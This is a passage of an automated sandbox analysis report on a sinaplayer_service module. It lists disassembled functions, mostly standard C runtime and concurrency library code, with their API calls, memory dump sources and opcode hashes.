                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: d0796892af8802650c00b57e30d32ff55555657f6d70f05d5d6d33f17602e571
                                                                                                                                                                                                    • Instruction ID: c777b1bb669dd4d93b38098faaa47118dc0fa26721d9f18f377466b23c85341b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0796892af8802650c00b57e30d32ff55555657f6d70f05d5d6d33f17602e571
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331A431101611AFE716DF19CA80FAA73F5FF8A310764851DED568B601CB31F942CBA0
                                                                                                                                                                                                    Function 6D0F3BC9 Relevance: 9.1, APIs: 6, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F3BD0
                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3BF1
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C14
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(00000018,6D0ED71D,00000001,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C40
                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(?,00000018,6D0ED71D,00000001,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C58
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C7C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Count64EntryInterlockedListTick__crt$??2@H_prolog3_catch
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1274909586-0
                                                                                                                                                                                                    • Opcode ID: a6584919152e431f328194b259527fa7e817d6dfb696fc077db07733ce8664d6
                                                                                                                                                                                                    • Instruction ID: e264176fe88cac77caef442f28e19bf3547516335c2d636fa9d64670bd7f6d42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6584919152e431f328194b259527fa7e817d6dfb696fc077db07733ce8664d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7331E071A056129FEB0ACF74C444BADBBF1BF49724F258629D965CB241DB30DA06CBC2
                                                                                                                                                                                                    Function 6D0B0D63 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D40FA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4104
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4110
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D411A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4142
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4149
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction ID: 62c6a0b42a988f235bb3fd5592c2503bdd14a26f2a3b493ad03244908ecd2779
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B31D53864C3479FF7028F29D89178F7BA5AF6A350F108116F9118B281D771D852C7A2
                                                                                                                                                                                                    Function 6D092EB8 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction ID: 8f16f5529a483c2093d689d34168b6f83bd586875e0d4e24ee1b2df57c77ee94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621AE3121430BDAFB12DE79C890BBE77A4BF15724B91522AE9248F2A0E771845197D1
                                                                                                                                                                                                    Function 6D092862 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: 21118100cbbe5d861a037cf4a075a8dc3dfc8e7837ca19d7b0035dacd5064d74
                                                                                                                                                                                                    • Instruction ID: 7ea5ce4ba4920024d63dd8e7e68da1d676add04710032ea4b2248f8cbcb57173
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21118100cbbe5d861a037cf4a075a8dc3dfc8e7837ca19d7b0035dacd5064d74
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9210231A1A7129BF722CE7C88407AF76E4EF95710FA1115AED249F2C0E770C840A7E2
                                                                                                                                                                                                    Function 6D10B935 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10B95C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10B966
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10B98A
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10B9A9
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10B9BF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10B9C9
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$_getptd_invalid_parameter_ismbblead_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 959098441-0
                                                                                                                                                                                                    • Opcode ID: 3252a056dfe37f55f8aae8bfbb9124206d09738d798fbd0ce30511ae7be5e211
                                                                                                                                                                                                    • Instruction ID: 68fa32601ddaee2391b7673a6e86c16355ce808d0c106f539834f61cbd2ef972
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3252a056dfe37f55f8aae8bfbb9124206d09738d798fbd0ce30511ae7be5e211
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F43104B150C387DED712AF28D5407AA7BB4BF22714F11415AE9A05F285CBB5C841CBA1
                                                                                                                                                                                                    Function 6D0F999C Relevance: 9.1, APIs: 6, Instructions: 83threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                      • Part of subcall function 6D0FA549: CreateThread.KERNEL32(00000000,00010000,00000000,00000000,?,6D0F22EF), ref: 6D0FA55C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D0F9A0D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0F9A1B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?), ref: 6D0F9A3D
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0F9A58,?), ref: 6D0F9A52
                                                                                                                                                                                                    • Concurrency::details::ThreadProxy::~ThreadProxy.LIBCMT ref: 6D0F9A6E
                                                                                                                                                                                                    • free.MSVCR120(?,00000002,006D0E92,?,6D0F9A58,?), ref: 6D0F9A7A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$Create$CloseConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorEventExceptionHandleLastProxyProxy::~Throw__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4077590961-0
                                                                                                                                                                                                    • Opcode ID: 69bf584b1323fff63a3b6fce97069932f6a80667822c8bde2cee4b2e3bf58105
                                                                                                                                                                                                    • Instruction ID: 1b33f432ceea4f43faf5ba2847bb359e71bdc01569c4f4793115cf8efeff3085
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69bf584b1323fff63a3b6fce97069932f6a80667822c8bde2cee4b2e3bf58105
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A21B671604656AFD301DF69E804BA9BBF4FF46210715826AE904C7641D770E822CBE5
                                                                                                                                                                                                    Function 6D0F9FA9 Relevance: 9.1, APIs: 6, Instructions: 79timeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6D0F9FC2
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR120 ref: 6D0FA012
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6D0F9F7B,?,?,00000000,00000020), ref: 6D0FA026
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,?,?), ref: 6D0FA043
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0FA075
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0AD1CC,6D0AC7FC,00000000,00000001,?,?), ref: 6D0FA08C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timer$Concurrency@@Version@std::exception::exception$CreateExceptionH_prolog3Manager@1@QueueQueue@details@ResourceSharedThreadpoolThrow___crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3581381746-0
                                                                                                                                                                                                    • Opcode ID: 7166bc015aafc0f676cdf9de1742b93dc6bbff1e3d5dd5300a4a7429c192f376
                                                                                                                                                                                                    • Instruction ID: ba93a74f73734ff58e3cc03f50d711ce9416a35f89ab24c452de1ff77fd58d4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7166bc015aafc0f676cdf9de1742b93dc6bbff1e3d5dd5300a4a7429c192f376
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD21817550C3466BE300DFA5E884F5FBBA8EB85704F248529FA5493142E730E909CBA2
                                                                                                                                                                                                    Function 6D0A433D Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4382
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4392
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A4399
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43C3
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43D8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43DE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeadInitializeList$??2@mallocmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3540956195-0
                                                                                                                                                                                                    • Opcode ID: ab465e4f04125c4a0179dc616a3eb97059c2d8dd1dc47e8edfe6213590815525
                                                                                                                                                                                                    • Instruction ID: 8ba2f8be058849cc31bf091b26dcfbb76a745f1b11bafe94205d048264e3ed77
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab465e4f04125c4a0179dc616a3eb97059c2d8dd1dc47e8edfe6213590815525
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 612141B2604602AFE748CF69D985655BBE8FF48310B45522EE60ACBA90D770E460CB94
                                                                                                                                                                                                    Function 6D0A43FE Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4443
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4453
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A445A
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4484
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4499
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A449F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeadInitializeList$??2@mallocmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3540956195-0
                                                                                                                                                                                                    • Opcode ID: f2927f046291637219f5e268574f3159704906f5f6c7206cf65b2e9dfb62bb62
                                                                                                                                                                                                    • Instruction ID: d14e41bd1fa8bddef9aa8e8c9ceb4ab26f443e43f62d8d0f661178a948c2fa54
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2927f046291637219f5e268574f3159704906f5f6c7206cf65b2e9dfb62bb62
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E72153B1604A02BFE708CF69D981655FBE8FF48320B45522EE61AC7ED0DB70E460CB94
                                                                                                                                                                                                    Function 6D0FAE9C Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0FAEA3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0FAECB
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0FAEDA
                                                                                                                                                                                                    • memset.MSVCR120(6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0FAF06
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000100,6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0FAF30
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000200,00000100,6D0E9323,00000000,00000100,00000004,6D0EA14B,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0FAF3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    • Opcode ID: cae87bed6e5aa366ec8bcc8a1bce144ff34b4843de7a58ae452a46d48737de8d
                                                                                                                                                                                                    • Instruction ID: 8650d4ba20ebb621e6f145a4bd2bd7f9cf3d657f2c039c653034c0797a70d405
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cae87bed6e5aa366ec8bcc8a1bce144ff34b4843de7a58ae452a46d48737de8d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99312DB0A50B408FE761CF39C444766BBE0FF09718F61886EC59ACBA80E7B5E545CB41
